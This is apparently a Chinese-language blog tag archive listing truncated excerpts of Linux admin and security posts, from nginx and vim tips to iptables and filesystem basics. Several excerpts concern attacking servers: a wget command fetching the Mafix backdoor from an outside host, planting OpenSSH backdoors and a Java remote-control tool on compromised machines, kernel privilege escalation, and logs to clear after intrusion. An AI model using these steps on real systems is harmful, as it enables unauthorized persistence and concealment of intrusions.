Menu

Tag Archives: Linux运维安全

每日端口监测扫描
每日端口监测扫描(首发在土司) #!/bin/bash PATH="/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin" Time=`date +%Y%m%d` [...]
Linux提权CVE-2016-0728漏洞的分析和利用
漏洞介绍 Perception Point研究团队发现了一个Linux内核的本地提权漏洞。虽然这个漏洞自2012年便已经存在,但Perception Point团队声称近期才发现这个漏洞,目前已经提交至内核安全团队,后续还会发布PoC利用代码。这个漏洞会影响到数以千万计的Linux [...]
利用iptables来配置linux禁止所有端口登陆和开放指定端口
1、关闭所有的 INPUT FORWARD OUTPUT 只对某些端口开放。 下面是命令实现: iptables -P INPUT DROP iptables -P FORWARD DROP iptables -P OUTPUT DROP 再用命令 iptables -L -n 查看 是否设置好, 好看到全部 [...]
Nginx解析漏洞的利用和修复方法
Nginx(发音同engine x)是一款轻量级的Web服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,由俄罗斯的程序设计师Igor Sysoev所开发,可以稳定地运行在Linux、Windows等操作系统上,其特点是占用内存少,并发能力强。 [...]
Redhat Linux安装JDK 1.7
刚刚拿下一台比较古老的Linux服务器 然后我准备给他上一个java的远控,但是java版本太低运行不了。。。。。 无奈,只能给他升级java版本了。 首先,下载JDK 1.7 安装包。 下载地址:传送门 官网下载地址:传送门 [...]
Linux下Nginx设置301重定向域名、目录的方法
Nginx设置301重定向相对还是比较容易的,301永久重定向不仅能使页面实现自动跳转,而且对于搜索引擎来说,可以传递网站权 重、收录以及PR值等。下面我们就详细说说Linux下Nginx设置301重定向的方法: 首先将多个域名指向同一web目录,代码如下: server_name [...]
Apache Rewrite 重定向功能的简单配置
Rewrite url重定向就是实现URL的跳转和隐藏真实地址,基于Perl语言的正则表达式规范。平时帮助我们实现拟静态,拟目录,域名跳转,防止盗链等。 1.Apache Rewrite的主要功能 [...]
Double Free浅析
最近在研究一些堆上面的漏洞。然后某一天骑自行车在路上跑的时候我突然悟出了Double Free的真谛。 2333好像太中二了一点,我是根据堆溢出的利用方法启发,再结合linux中libc的源码。研究出了double free的利用方法。虽然有关double [...]
Vim使用技巧之二
本文就说些其中比较有用, 比较常用的命令, 若能熟练运用这些命令, 那么会发现编辑文件很舒服. 说明: 以下的例子中 xxx 表示在命令模式下输入 xxx 并回车 以下的例子中 :xxx 表示在扩展模式下输入 xxx 并回车 小括号中的命令表示相关命令. 在编辑模式或可视模式下输入的命令会另外注明. 1. [...]
Vim使用技巧之一
1. 选定文字 / 拷贝粘贴 v为可视模式,可以选定多行。选定多行之后,可以用yy或者dd等等进行拷贝和剪切。 p 是粘贴 y 和d 可以直接拷贝或者剪切选定的内容 yw是拷贝一个单词 如果要复制整行的最简单办法就是V,y,p 就行了 [...]
linux文件系统基础知识
1、linux文件系统分配策略: 块分配( block allocation ) 和 扩展分配  ( extent allocation ) 块分配:磁盘上的文件块根据需要分配给文件,避免了存储空间的浪费。但当文件扩充时,会造成文件中文件块的不连续,从而导致过多的磁盘寻道时间。 [...]
Linux后门之Mafix
Linux后门有很多,openssh安装起来比较麻烦,下面介绍一款超见简单安装的Linux后门,使用方法非常简单: MAFIX 1.切换到home目录 cd /home 2.下载软件到home目录 wget http://www.k2a.cn/Tools/mafix.tar.gz 3.解压这个文件 tar [...]
Centos6.* yum的配置与安装
今天偶然间拿下一台服务器,12核速度非常快。进去一看,郁闷,啥组件功能都木有,本来想给他安装一个openssh后门的,但是PAM丢失OpenSSL丢失。yum install 运行直接报错。。。。 算了我给他重新安装一个yum吧。。。 1.删除自带的yum # rpm -aq|grep yum|xargs [...]
一次ssh被植入后门的经历及解决方案
某位小黑客从我博客下载了openssh后门,居然没有清理history这真没法忍啊!!! 前不久我一个朋友发现服务器上面很多程序被挂马了,晚上谁也没上过服务器,可以判定服务器已经被入侵了,开始排查: 1.首先查看安全日志,指定命令如下 more /var/log/secure |grep Accepted [...]
Linux渗透之openSSH后门
首先拿下服务器shell权限,其次利用各种方式提下root! 拿下root之后才是开始: 1.首先查看ssh版本: [email protected]:~# ssh -V OpenSSH_6.0p1 Debian-4+deb7u2, OpenSSL 1.0.1e 11 Feb 2013   2.下载SSH [...]
分享Kali-Linux下一些不错的源
以下是我自己搜集整理的在kali下使用效果不错的源 vim /etc/apt/sources.list deb http://security.kali.org/ kali/updates main contrib non-free deb-src http://security.kali.org/ [...]
手贱iptables -F 进不去系统了怎么办?
使用 iptables -F 要小心,搞不好,你就马上同服务器断开连接了 可以通过iptables -F清除所有规则来暂时停止防火墙: (警告:这只适合在没有配置防火墙的环境中,如果已经配置过默认规则为deny的环境,此步骤将使系统的所有网络访问中断) 如果想清空的话,先执行 iptables -P [...]
nginx重定向
rewrite命令 nginx的rewrite相当于apache的rewriterule(大多数情况下可以把原有apache的rewrite规则加上引号就可以直接使用),它可以用在server,location 和IF条件判断块中,命令格式如下: rewrite 正则表达式 替换目标 flag标记 [...]
Linux 系统日志查看与分析
Unix系统日志文件通常是存放在 “/var/log and /var/adm” 目录下的。通常我们可以查看syslog.conf来看看日志配置的情况.如:cat /etc/syslog.conf 一般我们要清除的日志有 lastlog utmp wtmp messages [...]
Nginx配置文件详解
Nginx配置文件详细说明 在此记录下Nginx服务器nginx.conf的配置文件说明, 部分注释收集与网络. #运行用户 user www-data; #启动进程,通常设置成和cpu的数量相等 worker_processes 1; #全局错误日志及PID文件 error_log [...]